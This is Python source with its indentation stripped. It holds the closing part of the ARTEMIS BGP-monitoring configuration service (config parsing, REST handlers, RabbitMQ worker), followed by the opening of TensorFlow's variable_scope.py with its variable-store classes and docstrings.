shared_memory_locks["ignore_fileobserver"].release()
shared_memory_locks["config_data"].acquire()
try:
# other configuration replica sends the correct data directly
if "data" in msg:
if msg["data"]:
shared_memory_manager_dict["config_data"] = msg["data"]
# update data hashes
shared_memory_manager_dict["section_hashes"] = {
"prefixes": get_hash(
shared_memory_manager_dict["config_data"]["prefixes"]
),
"asns": get_hash(shared_memory_manager_dict["config_data"]["asns"]),
"monitors": get_hash(
shared_memory_manager_dict["config_data"]["monitors"]
),
"rules": get_hash(
shared_memory_manager_dict["config_data"]["rules"]
),
"autoignore": get_hash(
shared_memory_manager_dict["config_data"]["autoignore"]
),
}
if "ignore_fileobserver" in msg:
shared_memory_locks["ignore_fileobserver"].acquire()
shared_memory_manager_dict["ignore_fileobserver"] = msg[
"ignore_fileobserver"
]
shared_memory_locks["ignore_fileobserver"].release()
ret_json = {"success": True, "message": "configured"}
else:
type_ = msg["type"]
raw_ = msg["content"]
# if received config from Frontend with comment
comment = None
if isinstance(raw_, dict) and "comment" in raw_:
comment = raw_["comment"]
del raw_["comment"]
raw = list(map(lambda x: x + "\n", raw_["config"].split("\n")))
else:
raw = raw_
if type_ == "yaml":
# the content is provided as a list of YAML lines so we have to join first
stream = StringIO("".join(raw))
data, _flag, _error = parse(stream, yaml=True)
else:
data, _flag, _error = parse(raw)
# _flag is True or False depending if the new configuration was
# accepted or not.
if _flag:
log.debug("accepted new configuration")
data_differ = False
# get previous conf key/hash and compare
(conf_key, yaml_conf) = read_conf(load_yaml=False, config_file=None)
if conf_key:
new_config_hash = get_hash(data["raw_config"])
if new_config_hash != conf_key:
data_differ = True
else:
# as fallback, compare current with previous data excluding --obviously-- timestamps
prev_data = copy.deepcopy(shared_memory_manager_dict["config_data"])
del prev_data["timestamp"]
new_data = copy.deepcopy(data)
del new_data["timestamp"]
prev_data_str = json.dumps(prev_data, sort_keys=True)
new_data_str = json.dumps(new_data, sort_keys=True)
if prev_data_str != new_data_str:
data_differ = True
if data_differ:
shared_memory_manager_dict["config_data"] = data
if comment:
shared_memory_manager_dict["config_data"]["comment"] = comment
# if the change did not come from the file observer itself,
# we ignore the file observer next changes (until it informs us again)
if not ("origin" in msg and msg["origin"] == "fileobserver"):
shared_memory_locks["ignore_fileobserver"].acquire()
shared_memory_manager_dict["ignore_fileobserver"] = True
shared_memory_locks["ignore_fileobserver"].release()
# calculate new data hashes, and compare them with stored ones
new_section_hashes = {
"prefixes": get_hash(
shared_memory_manager_dict["config_data"]["prefixes"]
),
"asns": get_hash(
shared_memory_manager_dict["config_data"]["asns"]
),
"monitors": get_hash(
shared_memory_manager_dict["config_data"]["monitors"]
),
"rules": get_hash(
shared_memory_manager_dict["config_data"]["rules"]
),
"autoignore": get_hash(
shared_memory_manager_dict["config_data"]["autoignore"]
),
}
difference_booleans = {}
for section in new_section_hashes:
difference_booleans[section] = (
new_section_hashes[section]
!= shared_memory_manager_dict["section_hashes"][section]
)
# update data hashes
shared_memory_manager_dict["section_hashes"] = {
"prefixes": new_section_hashes["prefixes"],
"asns": new_section_hashes["asns"],
"monitors": new_section_hashes["monitors"],
"rules": new_section_hashes["rules"],
"autoignore": new_section_hashes["autoignore"],
}
# by default notify configuration replicas in any case
services_to_notify = [SERVICE_NAME]
# if rules changes, notify everyone
if difference_booleans["rules"]:
services_to_notify = ALL_CONFIGURABLE_SERVICES
# if autoignore changes, notify prefixtree, database and autoignore
if difference_booleans["autoignore"]:
for service in [
PREFIXTREE_HOST,
DATABASE_HOST,
AUTOIGNORE_HOST,
]:
if service not in services_to_notify:
services_to_notify.append(service)
# if database not already scheduled to notify at this stage, append it
if DATABASE_HOST not in services_to_notify:
services_to_notify.append(DATABASE_HOST)
# if monitors changes, notify monitor services
if difference_booleans["monitors"]:
for service in MONITOR_SERVICES:
if service not in services_to_notify:
services_to_notify.append(service)
# configure needed services with the new config
post_configuration_to_other_services(
shared_memory_manager_dict, services=services_to_notify
)
# if the change did not come from the file observer itself,
# we write the file
if not ("origin" in msg and msg["origin"] == "fileobserver"):
write_conf_via_tmp_file(
shared_memory_manager_dict["config_file"],
shared_memory_manager_dict["tmp_config_file"],
shared_memory_manager_dict["config_data"]["raw_config"],
yaml=False,
)
# reply back to the sender with a configuration accepted
# message.
ret_json = {"success": True, "message": "configured"}
else:
log.debug("rejected new configuration")
# replay back to the sender with a configuration rejected and
# reason message.
ret_json = {"success": False, "message": _error}
except Exception:
log.exception("exception")
ret_json = {"success": False, "message": "unknown error"}
finally:
shared_memory_locks["config_data"].release()
return ret_json
class ConfigHandler(RequestHandler):
"""
REST request handler for configuration
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Simply provides the configuration (in the form of a JSON dict) to the requester.
Format:
{
"prefixes": <dict>,
"asns": <dict>,
"monitors": <dict>,
"rules": <list>,
"autoignore": <dict>,
"timestamp": <timestamp>
}
"""
self.write(self.shared_memory_manager_dict["config_data"])
def post(self):
"""
Parses and checks if new configuration is correct.
Replies back to the sender if the configuration is accepted
or rejected and notifies all services if new
configuration is used.
https://github.com/FORTH-ICS-INSPIRE/artemis/blob/master/backend/configs/config.yaml
sample request body:
{
"type": <yaml|json>,
"content": <list|dict>,
"origin": <str> (optional)
}
:return: {"success": True|False, "message": <message>}
"""
try:
msg = json.loads(self.request.body)
self.write(configure_configuration(msg, self.shared_memory_manager_dict))
except Exception:
self.write(
{"success": False, "message": "error during service configuration"}
)
class HealthHandler(RequestHandler):
"""
REST request handler for health checks.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Extract the status of a service via a GET request.
:return: {"status" : <unconfigured|running|stopped>}
"""
status = "stopped"
shared_memory_locks["data_worker"].acquire()
if self.shared_memory_manager_dict["data_worker_running"]:
status = "running"
shared_memory_locks["data_worker"].release()
self.write({"status": status})
class ControlHandler(RequestHandler):
"""
REST request handler for control commands.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def start_data_worker(self):
shared_memory_locks["data_worker"].acquire()
if self.shared_memory_manager_dict["data_worker_running"]:
log.info("data worker already running")
shared_memory_locks["data_worker"].release()
return "already running"
shared_memory_locks["data_worker"].release()
mp.Process(target=self.run_data_worker_process).start()
return "instructed to start"
def run_data_worker_process(self):
try:
with Connection(RABBITMQ_URI) as connection:
shared_memory_locks["data_worker"].acquire()
data_worker = ConfigurationDataWorker(
connection, self.shared_memory_manager_dict
)
self.shared_memory_manager_dict["data_worker_running"] = True
shared_memory_locks["data_worker"].release()
log.info("data worker started")
data_worker.run()
except Exception:
log.exception("exception")
finally:
shared_memory_locks["data_worker"].acquire()
self.shared_memory_manager_dict["data_worker_running"] = False
shared_memory_locks["data_worker"].release()
log.info("data worker stopped")
@staticmethod
def stop_data_worker():
shared_memory_locks["data_worker"].acquire()
try:
with Connection(RABBITMQ_URI) as connection:
with Producer(connection) as producer:
command_exchange = create_exchange("command", connection)
producer.publish(
"",
exchange=command_exchange,
routing_key="stop-{}".format(SERVICE_NAME),
serializer="ujson",
)
except Exception:
log.exception("exception")
finally:
shared_memory_locks["data_worker"].release()
message = "instructed to stop"
return message
def post(self):
"""
Instruct a service to start or stop by posting a command.
Sample request body
{
"command": <start|stop>
}
:return: {"success": True|False, "message": <message>}
"""
try:
msg = json.loads(self.request.body)
command = msg["command"]
# start/stop data_worker
if command == "start":
message = self.start_data_worker()
self.write({"success": True, "message": message})
elif command == "stop":
message = self.stop_data_worker()
self.write({"success": True, "message": message})
else:
self.write({"success": False, "message": "unknown command"})
except Exception:
log.exception("Exception")
self.write({"success": False, "message": "error during control"})
class Configuration:
"""
Configuration REST Service.
"""
def __init__(self):
# initialize shared memory
shared_memory_manager = mp.Manager()
self.shared_memory_manager_dict = shared_memory_manager.dict()
self.shared_memory_manager_dict["data_worker_running"] = False
self.shared_memory_manager_dict["config_file"] = "/etc/artemis/config.yaml"
self.shared_memory_manager_dict[
"tmp_config_file"
] = "/etc/artemis/config.yaml.tmp"
self.shared_memory_manager_dict["config_data"] = {}
self.shared_memory_manager_dict["ignore_fileobserver"] = False
self.shared_memory_manager_dict["section_hashes"] = {
"prefixes": None,
"asns": None,
"monitors": None,
"rules": None,
"autoignore": None,
}
log.info("service initiated")
def make_rest_app(self):
return Application(
[
(
"/config",
ConfigHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/control",
ControlHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/health",
HealthHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/loadAsSets",
LoadAsSetsHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/hijackLearnRule",
HijackLearnRuleHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
]
)
def start_rest_app(self):
app = self.make_rest_app()
app.listen(REST_PORT)
log.info("REST worker started and listening to port {}".format(REST_PORT))
IOLoop.current().start()
class ConfigurationDataWorker(ConsumerProducerMixin):
"""
RabbitMQ Consumer/Producer for the Configuration Service.
"""
def __init__(
self, connection: Connection, shared_memory_manager_dict: Dict
) -> NoReturn:
self.connection = connection
self.shared_memory_manager_dict = shared_memory_manager_dict
self.redis = redis.Redis(host=REDIS_HOST, port=REDIS_PORT)
ping_redis(self.redis)
# EXCHANGES
self.autoconf_exchange = create_exchange("autoconf", connection, declare=True)
self.command_exchange = create_exchange("command", connection, declare=True)
# QUEUES
self.autoconf_filtered_update_queue = create_queue(
SERVICE_NAME,
exchange=self.autoconf_exchange,
routing_key="filtered-update",
priority=4,
random=True,
)
self.stop_queue = create_queue(
"{}-{}".format(SERVICE_NAME, uuid()),
exchange=self.command_exchange,
routing_key="stop-{}".format(SERVICE_NAME),
priority=1,
)
log.info("data worker initiated")
def get_consumers(self, Consumer: Consumer, channel: Connection) -> List[Consumer]:
return [
Consumer(
queues=[self.autoconf_filtered_update_queue],
on_message=self.handle_filtered_autoconf_updates,
prefetch_count=1,
accept=["ujson"],
),
Consumer(
queues=[self.stop_queue],
on_message=self.stop_consumer_loop,
prefetch_count=100,
accept=["ujson"],
),
]
def handle_filtered_autoconf_updates(self, message):
"""
Receives a "autoconf-update" message batch (filtered by the prefixtree),
translates the corresponding BGP updates into ARTEMIS configuration
and rewrites the configuration
:param message:
:return:
"""
if not message.acknowledged:
message.ack()
try:
bgp_updates = message.payload
if not isinstance(bgp_updates, list):
bgp_updates = [bgp_updates]
# load initial YAML configuration
(conf_key, yaml_conf) = read_conf(
load_yaml=True,
config_file=self.shared_memory_manager_dict["config_file"],
)
# process the autoconf updates
conf_needs_update = False
updates_processed = set()
for bgp_update in bgp_updates:
# if you have seen the exact same update before, do nothing
if self.redis.get(bgp_update["key"]):
return
if self.redis.exists(
"autoconf-update-keys-to-process"
) and not self.redis.sismember(
"autoconf-update-keys-to-process", bgp_update["key"]
):
return
learn_neighbors = False
if "learn_neighbors" in bgp_update and bgp_update["learn_neighbors"]:
learn_neighbors = True
# translate the BGP update information into ARTEMIS conf primitives
(rule_prefix, rule_asns, rules) = translate_bgp_update_to_dicts(
bgp_update, learn_neighbors=learn_neighbors
)
# check if withdrawal (which may mean prefix/rule removal)
withdrawal = False
if bgp_update["type"] == "W":
withdrawal = True
# create the actual ARTEMIS configuration (use copy in case the conf creation fails)
msg, ok = translate_learn_rule_dicts_to_yaml_conf(
yaml_conf, rule_prefix, rule_asns, rules, withdrawal=withdrawal
)
if ok:
# update running configuration
conf_needs_update = True
updates_processed.add(bgp_update["key"])
else:
log.error("!!!PROBLEM with rule autoconf installation !!!!!")
log.error(msg)
log.error(bgp_update)
# remove erroneous update from circulation
if self.redis.exists("autoconf-update-keys-to-process"):
redis_pipeline = self.redis.pipeline()
redis_pipeline.srem(
"autoconf-update-keys-to-process", bgp_update["key"]
)
redis_pipeline.execute()
# cancel operations
break
# update configuration
if conf_needs_update:
configure_configuration(
{
"type": "yaml",
"content": ruamel.yaml.dump(
yaml_conf, Dumper=ruamel.yaml.RoundTripDumper
),
},
self.shared_memory_manager_dict,
)
# acknowledge the processing of autoconf BGP updates using redis
if len(updates_processed) > 0 and self.redis.exists(
"autoconf-update-keys-to-process"
):
redis_pipeline = self.redis.pipeline()
for bgp_update_key in updates_processed:
redis_pipeline.srem(
"autoconf-update-keys-to-process", bgp_update_key
)
redis_pipeline.execute()
except Exception:
log.exception("exception")
def stop_consumer_loop(self, message: Dict) -> NoReturn:
"""
Callback function that stop the current consumer loop
"""
message.ack()
self.should_stop = True
def main():
# initiate configuration service with REST
configurationService = Configuration()
# reads and parses initial configuration file
shared_memory_locks["config_data"].acquire()
try:
(conf_key, raw) = read_conf(
load_yaml=False,
config_file=configurationService.shared_memory_manager_dict["config_file"],
)
configurationService.shared_memory_manager_dict[
"config_data"
], _flag, _error = parse(raw, yaml=True)
# update data hashes
configurationService.shared_memory_manager_dict["section_hashes"] = {
"prefixes": get_hash(
configurationService.shared_memory_manager_dict["config_data"][
"prefixes"
]
),
"asns": get_hash(
configurationService.shared_memory_manager_dict["config_data"]["asns"]
),
"monitors": get_hash(
configurationService.shared_memory_manager_dict["config_data"][
"monitors"
]
),
"rules": get_hash(
configurationService.shared_memory_manager_dict["config_data"]["rules"]
),
"autoignore": get_hash(
configurationService.shared_memory_manager_dict["config_data"][
"autoignore"
]
),
}
# configure all other services (independent of hash changes, since it is startup) with the current config
post_configuration_to_other_services(
configurationService.shared_memory_manager_dict
)
except Exception:
log.exception("exception")
finally:
shared_memory_locks["config_data"].release()
# start REST within main process
configurationService.start_rest_app()
if __name__ == "__main__":
main()
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
_api_usage_gauge = monitoring.BoolGauge(
"/tensorflow/api/resource_variables",
"Whether variable_scope.enable_resource_variables() is called.")
class _PartitionInfo(object):
"""Holds partition info used by initializer functions."""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape of
the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(shape),
self.full_shape,
len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
_api_usage_gauge.get_cell().set(True)
@tf_export(v1=["resource_variables_enabled"])
def resource_variables_enabled():
"""Returns `True` if resource variables are enabled.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
return _DEFAULT_USE_RESOURCE
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
_api_usage_gauge.get_cell().set(False)
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys and
the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). `trainable`
defaults to `True`, unless `synchronization` is set to `ON_READ`, in
which case it defaults to `False`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method. The signature
of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes: `def
custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed: `def
custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs): return getter(name +
'_suffix', *args, **kwargs) ```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize. If `synchronization` is set to `ON_READ`, `trainable` must
not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError("Passed a custom_getter which is not callable: %s" %
custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (
shape is not None and isinstance(shape, collections_lib.Sequence) and
not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError("Partitioner must be callable, but received: %s" %
partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
synchronization, aggregation, trainable, name))
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
